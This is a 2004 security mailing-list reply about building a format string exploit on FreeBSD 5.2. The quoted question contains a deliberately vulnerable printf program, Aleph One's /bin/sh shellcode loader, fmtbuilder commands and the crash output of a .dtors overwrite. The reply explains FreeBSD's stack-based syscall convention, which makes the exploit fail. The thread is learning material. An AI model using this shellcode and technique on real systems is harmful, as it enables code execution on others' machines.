Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT

i didn't look at your shellcode, but if you're using generic aleph code
it won't work on freebsd. freebsd makes system calls differently than
on linux, it doesn't put args in registers, it pushes them onto the
stack. if you're trying to learn how to write exploits, then when the
thing dumps core, you should probably look at the core dump. it will
tell you where it dumped core, and you can look at dtors address to
verify that you actually overwrote correct location w/ correct value.

On Thu, 29 Jul 2004 17:02:50 +0900
Ganbold <ganbold_at_micom.mng.net> wrote:

> Hi all,
>
> I have sample format string exploit problem in FreeBSD 5.2-CURRENT.
>
> $uname -an
> FreeBSD localhost 5.2-CURRENT FreeBSD 5.2-CURRENT #8: Wed Mar 3
> 11:09:58 ULAT 2004 tsgan_at_localhost:/usr/obj/usr/src/sys/MX i386
>
> I'm using http://www.groar.org/expl/howto/fmtbuilder.txt to build the
> format string.
>
> I can get the offset:
> ---------------------------------------------------------------------
> ------------------------------------ bash-2.05b$ ./fmt_vuln "AAAA %x
> %x %x %x %x %x" The right way:
> AAAA %x %x %x %x %x %x
> The wrong way:
> AAAA bfbfdfb8 0 0 0 0 41414141
> [*] test_val @ 0x0804977c = -72 0xffffffb8
> ---------------------------------------------------------------------
> ------------------------------------
>
> Then I'm getting DTORs address:
>
> ---------------------------------------------------------------------
> ------------------------------------ bash-2.05b$ objdump -s -j .dtors
> fmt_vuln
>
> fmt_vuln: file format elf32-i386-freebsd
>
> Contents of section .dtors:
> 8049824 ffffffff 00000000 ........
>
> bash-2.05b$ nm ./fmt_vuln|grep DTOR
> 08049828 d __DTOR_END__
> 08049824 d __DTOR_LIST__
> ---------------------------------------------------------------------
> ------------------------------------
>
> Afterwards I'm storing shellcode in env using AlephOne's exploit code
> (See below).
>
> ---------------------------------------------------------------------
> ------------------------------------$ ./getsx1 200
> Using address: 0xbfbfec78
> bash-2.05b$
>
> bash-2.05b$ ./getenvaddr EGG
> EGG is located at 0xbfbfe557
> ---------------------------------------------------------------------
> ------------------------------------
>
> When I run exploit I get:
>
> ---------------------------------------------------------------------
> ------------------------------------ bash-2.05b$ ./fmt_vuln
> `./fmtbuilder -n -a 0x08049828 -r 0xbfbfe557 -o 6 -b 0` Format string
> builder version 0.2(C) 2001 Pappy & Zorgon
>
> [ Building the fmt string ... ]
> [ Building completed (52) ]
> [ Checking the fmt string ... ]
> [ Checking completed (52) ]
>
> [ fmt string ] = %327x%6$n%398x%7$n%218x%8$n%256x%9$n
>
> The right way:
> %327x%6$n%398x%7$n%218x%8$n%256x%9$n
> The wrong way:
> Bus error (core dumped)
>
> bash-2.05b$ ./fmt_vuln `./fmtbuilder -n -a 0x08049824 -r 0xbfbfe557 -o
> 6 -b 0` Format string builder version 0.2
> (C) 2001 Pappy & Zorgon
>
> [ Building the fmt string ... ]
> [ Building completed (52) ]
> [ Checking the fmt string ... ]
> Found a % at 4.
> [ Checking completed (52) ]
>
> [ fmt string ] = %%327x%6$n%398x%7$n%218x%8$n%256x%9$n
>
> The right way:
> %%327x%6$n%398x%7$n%218x%8$n%256x%9$n
> The wrong way:
> Bus error (core dumped)
>
> ---------------------------------------------------------------------
> ------------------------------------
>
> So I get Bus error (core dumped) result. But in my opinion I should
> get shell. Somehow exploit is not working and I don't know the reason.
> I tried many times and no result.
> It seems like format string exploit in FreeBSD is different than
> Linux.
>
> Does anybody have experience developing format string exploit in
> FreeBSD before?
> Did somebody solve this kind of problem before?
>
> Can somebody give me some hints, advices and guides?
>
> I googled for this kind of problem, and find only in this list last
> June someone had problem,
> but didn't find the solution.
>
> Can somebody help me in this regard?
>
> thanks in advance,
>
> Ganbold
>
>
> Followings are vulnerable program, getenvaddr.c, Aleph One exploit:
>
> ---------------------------------------------------------------------
> ------------------------------------ Vulnerable program:
> ---------------------------------------------------------------------
> ------------------------------------
> #include <stdlib.h>
>
> int main(int argc, char *argv[])
> {
> char text[1024];
> static int test_val = -72;
>
> if(argc < 2)
> {
> printf("Usage: %s <text to print>\n", argv[0]);
> exit(0);
> }
> strcpy(text, argv[1]);
>
> printf("The right way:\n");
> printf("%s", text);
>
> printf("\nThe wrong way:\n");
> printf(text);
> printf("\n");
>
> // Debug output
> printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val,
>
> test_val);
>
> exit(0);
> }
> ---------------------------------------------------------------------
> ------------------------------------
>
>
> Aleph One's exploit code
> ---------------------------------------------------------------------
> ------------------------------------
> #include <stdlib.h>
>
> #define DEFAULT_OFFSET 0
> #define DEFAULT_BUFFER_SIZE 512
> #define DEFAULT_EGG_SIZE 2048
> #define NOP 0x90
>
> char shellcode[] =
> "\x31\xc0" /* xorl %eax, %eax */
> "\x50" /* pushl %eax */
> "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
> "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
> "\x89\xe3" /* movl %esp, %ebx */
> "\x50" /* pushl %eax */
> "\x53" /* pushl %ebx */
> "\x89\xe2" /* movl %esp, %edx */
> "\x50" /* pushl %eax */
> "\x52" /* pushl %edx */
> "\x53" /* pushl %ebx */
> "\x50" /* pushl %eax */
> "\xb0\x3b" /* movb $0x3b, %al */
> "\xcd\x80" /* int $0x80 */
> "\x31\xc0" /* xorl %eax, %eax */
> "\x40" /* inc %eax */
> "\x50" /* pushl %eax */
> "\x50" /* pushl %eax */
> "\xcd\x80"; /* int $0x80 */
>
>
> unsigned long get_esp(void) {
> __asm__("movl %esp,%eax");
> }
>
> void main(int argc, char *argv[]) {
> char *buff, *ptr, *egg;
> long *addr_ptr, addr;
> int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
> int i, eggsize=DEFAULT_EGG_SIZE;
>
> if (argc > 1) bsize = atoi(argv[1]);
> if (argc > 2) offset = atoi(argv[2]);
> if (argc > 3) eggsize = atoi(argv[3]);
>
> if (!(buff = malloc(bsize))) {
> printf("Can't allocate memory.\n");
> exit(0);
> }
> if (!(egg = malloc(eggsize))) {
> printf("Can't allocate memory.\n");
> exit(0);
> }
>
> addr = get_esp() - offset;
> printf("Using address: 0x%x\n", addr);
>
> ptr = buff;
> addr_ptr = (long *) ptr;
> for (i = 0; i < bsize; i+=4)
> *(addr_ptr++) = addr;
>
> ptr = egg;
> for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
> *(ptr++) = NOP;
>
> for (i = 0; i < strlen(shellcode); i++)
> *(ptr++) = shellcode[i];
>
> buff[bsize - 1] = '\0';
> egg[eggsize - 1] = '\0';
>
> memcpy(egg,"EGG=",4);
> putenv(egg);
> memcpy(buff,"RET=",4);
> putenv(buff);
> system("/usr/local/bin/bash");
> }
> ---------------------------------------------------------------------
> ------------------------------------
>
> getenvaddr.c
> ---------------------------------------------------------------------
> ------------------------------------
> #include <stdlib.h>
>
> int main(int argc, char *argv[])
> {
> char *addr;
> if(argc < 2)
> {
> printf("Usage:\n%s <environment variable name>\n", argv[0]);
> exit(0);
> }
> addr = getenv(argv[1]);
> if(addr == NULL)
> printf("The environment variable %s doesn't exist.\n", argv[1]);
> else
> printf("%s is located at %p\n", argv[1], addr);
> return 0;
> }
>

-- 
-sean